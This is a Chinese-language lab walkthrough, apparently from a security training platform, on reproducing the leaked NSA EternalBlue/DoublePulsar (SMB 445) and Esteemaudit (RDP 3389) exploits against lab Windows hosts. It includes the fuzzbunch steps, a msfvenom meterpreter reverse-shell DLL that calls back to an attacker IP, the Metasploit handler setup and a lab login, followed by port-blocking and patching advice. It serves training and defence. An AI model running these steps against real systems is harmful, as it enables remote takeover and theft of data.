【NSA黑客工具包】Windows-0day驗證實驗

Shadow Brokers再次暴露出一份震驚世界的機密文檔，其中包含了多個Windows 遠程漏洞利用工具，可以覆蓋大量的 Windows 伺服器，一夜之間所有Windows伺服器幾乎全線暴露在危險之中，任何人都可以直接下載並遠程攻擊利用，考慮到國內不少高校、政府、國企甚至還有一些互聯網公司還在使用 Windows 伺服器，這次事件影響力堪稱網路大地震。

影響版本

全球70%的 Windows 伺服器，包括Windows NT、Windows 2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8，Windows 2008、Windows 2008 R2、Windows Server 2012 SP0

危害

攻擊者通過執行腳本，使目標主機藍屏重啟，獲取Windows目標主機許可權，對目標機器進行任意操作，攻擊成本和利用條件都很低，只需在本地執行腳本，並設置相關參數。一旦攻擊成功，攻擊者能直接控制目標主機，甚至直接下載資料庫，盜取商業機密，很多的政府、事業單位都會受到影響，影響極大，危害不言而喻。

實驗工具

Metasploit：是一款開源的安全漏洞檢測工具，可以幫助安全和IT專業人士識別安全性問題，驗證漏洞的緩解措施，並管理專家驅動的安全性進行評估，提供真正的安全風險情報。這些功能包括智能開發，代碼審計，Web應用程序掃描，社會工程等。

Equation Group Tools：這是一個集成的工具包，裡面包含了IIS6.0、445埠、3389埠、Rootkit等遠程利用工具，本次試驗我們主要用到它的445埠遠程入侵功能，以及3389遠程埠入侵功能。

實驗目的

掌握工具的用法以及臨時防禦措施

實驗步驟

步驟1：利用Eternalblue與Doublepulsar插件，驗證445 SMB漏洞

我們本步驟利用Eternalblue和Doublepulsar這兩個"插件"來獲取Windows 7 64位的系統許可權。其中Eternalblue可以利用SMB漏洞，獲取Windows 7 系統許可權而Doublepulsar可以載入Metasploit生成的惡意DLL。

我們首先進入cmd命令行，在命令行中進入文件夾：

cd C:/EQGRP_Lost_in_Translation-master/Windows

輸入命令：

fb.py //運行python文件

註：在一般情況下需要在工具根目錄下創建listeningposts文件夾，否則運行文件時，會報錯。

接下來依次填入對應信息：

172.16.12.3 //目標IP

172.16.11.2 //本地IP

no //取消重定向

c:logs //指定日誌文件目錄

繼續填入相關新信息：

0 //創建一個新項目

Test_Win7 //項目名稱

Yes //確認路徑

到這裡就完成了最基本的信息配置，正式啟動了腳本，接下來繼續進行配置，這時就要用到第一個插件了，使用命令：

use Eternalbluet //使用Eternalblue

注意這裡要選擇操作系統、系統位數、傳輸方式，我們分別選擇Windows 7、64位、FB傳輸方式，其他配置信息直接按回車鍵，保持默認即可。

當看到Eternalblue Succeeded字樣，代表成功。

接下來需要用到Metasploit，使用Everything搜索並使用XShell連接到Kali Linux：

連接成功後，使用如下命令生成惡意DLL：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.12.2 LPORT=12399 -f dll >win.dll

這時，/home目錄下就會生成win.dll文件，然後使用如下命令進入Metasploit，設置TCP監聽埠，用於接受攻擊成功後返回的Shell：

msfconsole

use exploit/multi/handler //使用監聽模塊

set payload windows/x64/meterpreter/reverse_tcp //設置payload

show options //查看配置信息

set LHOST 172.16.12.2 //設置本地IP

set LPORT 12399 //設置本地埠

run //運行

如圖，Metasploit已經成功運行，等待Shell的返回。

現在將之前生成的win.dll文件通過FTP複製到Windows機器上，首先點擊下圖中使用紅色小框標示的圖標：

本文中，我將dll文件放在C盤根目錄：

接下來使用Doublepulsar來載入生成的dll文件。

註：這裡系統位數、後門操作、後門路徑，我們分別選擇64位、RunDLL、c:/win.dll，其他保持默認即可

配置完之後，提示成功。

我們再來查看Metasploit

可以看到，成功的利用了插件，已經獲取了Shell。

步驟2：利用Esteemaudit插件，驗證3389 RDP漏洞

本步驟利用Esteemaudit插件，來驗證漏洞存在。(本步驟的目標地址為172.16.12.4)

與上一步驟一樣，首先設置基本信息，這裡就不在贅述：

基本信息配置完成之後，下面對ESTEEMAUDIT 插件進行配置：

use ESTEEMAUDIT //使用ESTEEMAUDIT插件

這裡我將CallbackPort設置為8899埠（其他埠也可以）

手動載入rudo_x86.dll和capa_x86.dll ，因為插件默認選項都在D盤，它不能識別安裝目錄，我們需要手動輸入位置，位於windowsstorage，如圖：

手動載入lipa_x86.dll，原因同上：

其他保持默認即可。

可以看到，成功執行。（同學們也可以使用3389埠對Windows Server 2003進行登錄，賬號密碼為 [administrator，ichunqiu123. ]，使用命令netstat -ano 查看是否成功連接）

臨時修復方案

1、使用防火牆過濾/關閉 137、139、445埠。

2、對於 3389 遠程登錄，如果不想關閉的話，至少要關閉智能卡登錄功能。

3、升級補丁，更新系統。

實驗場景連接：【NSA黑客工具包】Windows 0day驗證實驗

推薦閱讀：